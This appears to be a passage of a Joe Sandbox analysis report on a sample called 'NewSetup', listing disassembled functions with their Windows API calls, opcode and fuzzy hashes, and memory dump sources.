                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3505371420-0
                                                                                                      • Opcode ID: c40ad02e84c92c93519458df5581dbf242fb4d7697a77b368cdc5ee8402ec8dc
                                                                                                      • Instruction ID: 36c8dba07fce1373977d540127f6206a925f14ae3042f967c2f560b4e0342160
                                                                                                      • Opcode Fuzzy Hash: c40ad02e84c92c93519458df5581dbf242fb4d7697a77b368cdc5ee8402ec8dc
                                                                                                      • Instruction Fuzzy Hash: 82F0E5B191125067D6216724FC4FEEB7BACDF96710F000514F5894A281EA7451658A93
                                                                                                      Function 0022BED7 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,002302B4,?,00000000,?,?,0022FF54,?,00000007,?,?,0023089A,?,?), ref: 0022BEED
                                                                                                      • GetLastError.KERNEL32(?,?,002302B4,?,00000000,?,?,0022FF54,?,00000007,?,?,0023089A,?,?), ref: 0022BEF8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 485612231-0
                                                                                                      • Opcode ID: 03ba62490681eaa2ba611fe9cbc9ede0a2440944084fdd4225da14a3499db925
                                                                                                      • Instruction ID: 3af4d128234db2edc2e2b6c19d080be73b64ccbd2707b5c817942e84da82aed9
                                                                                                      • Opcode Fuzzy Hash: 03ba62490681eaa2ba611fe9cbc9ede0a2440944084fdd4225da14a3499db925
                                                                                                      • Instruction Fuzzy Hash: E8E0C276208224BBCB122FF5FC0CB993B68EB12391F114022F60896570CB308860CF94
                                                                                                      Function 0021DEF0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 06646790285ab86a3082b62b5401ef3138b96cc82342f31f184284c9ba6e86d0
                                                                                                      • Instruction ID: 8a3b1e6210725fe69229f3d463e78197589b68253c4f5abc3cfe342df46752dd
                                                                                                      • Opcode Fuzzy Hash: 06646790285ab86a3082b62b5401ef3138b96cc82342f31f184284c9ba6e86d0
                                                                                                      • Instruction Fuzzy Hash: 1D416C31A2011AEBCF14DF68C8949EDB7F9BF29310B540169E442E7A40E771EAA59B90
                                                                                                      Function 0021CB40 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3904a46561abed6ba51411b1e6679709c40f3fa676eb4dc4009715957e215503
                                                                                                      • Instruction ID: f87f635d0d8c69e6b721394f1a439d924be45269af77cef6fe2ea3d781313c82
                                                                                                      • Opcode Fuzzy Hash: 3904a46561abed6ba51411b1e6679709c40f3fa676eb4dc4009715957e215503
                                                                                                      • Instruction Fuzzy Hash: EE31A77592411AAFCB04CF68D8809DEB7F8BF19324B240266E411E3690D731EDA4CB90
                                                                                                      Function 0021B060 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0021AFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,00218A2A,?,?,0021AF87,00218A2A,?,0021AF58,00218A2A,?,?,?), ref: 0021AFD0
                                                                                                      • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,456001D6,?,?,?,Function_0002BE94,000000FF), ref: 0021B0C7
                                                                                                        • Part of subcall function 0021AEFA: std::_Throw_Cpp_error.LIBCPMT ref: 0021AF1B
                                                                                                        • Part of subcall function 0021EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00218E4A,0021A2F0), ref: 0021EFE7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3627539351-0
                                                                                                      • Opcode ID: 934bb91aabd4cd94c948c9455a103d249ef5f77337a5e575063d84b1c1719b6b
                                                                                                      • Instruction ID: da4d68342da8e10debeb12bbd3dd5494dd1e55262e2f13c5a9ce87af755966fc
                                                                                                      • Opcode Fuzzy Hash: 934bb91aabd4cd94c948c9455a103d249ef5f77337a5e575063d84b1c1719b6b
                                                                                                      • Instruction Fuzzy Hash: 6011383661060557CB266F29EC09EAE77E9EF62B20F10441AF80187AD1CB35D8A1CE41
                                                                                                      Function 0022CFD6 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4d2c598c76b91b085e797ceb1121d53e01b6a2ebd6360b43d13765e8aa1c0638
                                                                                                      • Instruction ID: 82034ca6203beda9973558bd924c4a330ed882b0086fe5a1bf8416111210f4cf
                                                                                                      • Opcode Fuzzy Hash: 4d2c598c76b91b085e797ceb1121d53e01b6a2ebd6360b43d13765e8aa1c0638
                                                                                                      • Instruction Fuzzy Hash: B501F537234235BF9F168FE8FC44916336ABBC2720B264125F9008B0A4DB31D9219B60
                                                                                                      Function 0021CB32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalLeaveSection
                                                                                                      • String ID:
                                                                                                      • API String ID: 3988221542-0
                                                                                                      • Opcode ID: f0b364f768d41173196ef20c6453c0e08cd97bfbb037219795f6f2f6c9fb56d4
                                                                                                      • Instruction ID: 20b83f12c36a0505c7adf983b9b8b828873e2154376718701c2c2699b17968b3
                                                                                                      • Opcode Fuzzy Hash: f0b364f768d41173196ef20c6453c0e08cd97bfbb037219795f6f2f6c9fb56d4
                                                                                                      • Instruction Fuzzy Hash: C001217E6AC2875ECB059E78F8252E9BBA0FFB5338B34416FD011C4581CB2298B0C780
                                                                                                      Function 00217770 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::_Release_chore.LIBCPMT ref: 002177C6
                                                                                                        • Part of subcall function 0021AF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,002178DA,00000000), ref: 0021AF72
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
                                                                                                      • String ID:
                                                                                                      • API String ID: 312417170-0
                                                                                                      • Opcode ID: 63ea20267279d9dd5581872d97e7f14d0d5fc45e2946e7ebce5b269414bddf2b
                                                                                                      • Instruction ID: b4b16ae2569b60adb6fcd8311f49e153166f510e5681cf9898936c3402e5b606
                                                                                                      • Opcode Fuzzy Hash: 63ea20267279d9dd5581872d97e7f14d0d5fc45e2946e7ebce5b269414bddf2b
                                                                                                      • Instruction Fuzzy Hash: 31014BB1C006599BDB04EF94DC457DEBBB4FB44720F00423AE81967741E379AA95CBD2
                                                                                                      Function 0022BF11 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,0022DF35,?,?,0022DF35,00000220,?,00000000,?), ref: 0022BF43
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 7c94109e2c9ff222515371a66876f7f5085b95aaa8c87c23a7c35ac908c3973b
                                                                                                      • Instruction ID: ca2373e350f38a8768a251ccb0528f3e3c49464e68b5559639f0486cec76b8d0
                                                                                                      • Opcode Fuzzy Hash: 7c94109e2c9ff222515371a66876f7f5085b95aaa8c87c23a7c35ac908c3973b
                                                                                                      • Instruction Fuzzy Hash: 38E02B3513567277DB232EE5BE04B5A375CAF427A0F150160FC1C96990DB60DC20CDE1
                                                                                                      Function 002198F0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0021990F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0
                                                                                                      • Opcode ID: 0295d1094308b5acbbfc8c8e862159dd7d490dcd6eac7e6e6dcc1f7efaad2a63
                                                                                                      • Instruction ID: 9db0e7d25443218f6aa7af3be8cf57cf73956ea9c46a3a3322abede4dcdb7de5
                                                                                                      • Opcode Fuzzy Hash: 0295d1094308b5acbbfc8c8e862159dd7d490dcd6eac7e6e6dcc1f7efaad2a63
                                                                                                      • Instruction Fuzzy Hash: C1D0A73A7110244F47157F38B82886E73A6FFD972039A0459E940D7345C734EC928BC0

                                                                                                      Non-executed Functions

                                                                                                      Function 00231287 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0023138F
                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 002313CD
                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 002313E0
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00231428
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00231443
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                      • String ID: ,K$
                                                                                                      • API String ID: 415426439-3784840329
                                                                                                      • Opcode ID: b37e7108457273ae00255bbef4841ac1ecfa0397fc55504b8666e67e4fea97e8
                                                                                                      • Instruction ID: 5b95c0d679e26cda28a9704b7f35eaebb26159667a6d840a939b8c488d665690
                                                                                                      • Opcode Fuzzy Hash: b37e7108457273ae00255bbef4841ac1ecfa0397fc55504b8666e67e4fea97e8
                                                                                                      • Instruction Fuzzy Hash: 9D5171B1A20216ABDF10EFA5DC85ABE77B8FF09700F144469FA05E7190E7709A74CB61
                                                                                                      Function 00237792 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __floor_pentium4
                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                      • Opcode ID: 3905fafcee4cbe126991e9fbf8151e5334b65ae0495fce2114264cef6b8b9363
                                                                                                      • Instruction ID: b1b5aaf3793e53f495334ac364c4a3c2ca15ac5d8630ef4d892da8f3ae16746b
                                                                                                      • Opcode Fuzzy Hash: 3905fafcee4cbe126991e9fbf8151e5334b65ae0495fce2114264cef6b8b9363
                                                                                                      • Instruction Fuzzy Hash: 7FD23BB1E282298FDF65CE28DD447EAB7B5EB44304F1441EAE40DE7240EB74AE958F41
                                                                                                      Function 00231A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,002313BD,00000002,00000000,?,?,?,002313BD,?,00000000), ref: 00231AA0
                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,002313BD,00000002,00000000,?,?,?,002313BD,?,00000000), ref: 00231AC9
                                                                                                      • GetACP.KERNEL32(?,?,002313BD,?,00000000), ref: 00231ADE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 2299586839-711371036
                                                                                                      • Opcode ID: f1b2e8fa678b2577f55673386be907556e972469d4d7b49965497b18044f3758
                                                                                                      • Instruction ID: 951cd5ad9889f300755748124baa1fd8807fdd59332a71b85a7f307f65e2c015
                                                                                                      • Opcode Fuzzy Hash: f1b2e8fa678b2577f55673386be907556e972469d4d7b49965497b18044f3758
                                                                                                      • Instruction Fuzzy Hash: 7921C8A2B32102ABD734CF54C904A9773AAEF55F56F568425E94AD7200EB32DD70C390
                                                                                                      Function 00229CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                      • Instruction ID: 3facbbe92dc0a9d2c90f907b5c31563bd54093f51d58ff8732c4bf3485a0c294
                                                                                                      • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                      • Instruction Fuzzy Hash: C6025C71E1022AABDF14CFA8D9807AEF7B5FF48314F24826AD519E7341D731AA51CB90
                                                                                                      Function 00231FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002320D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
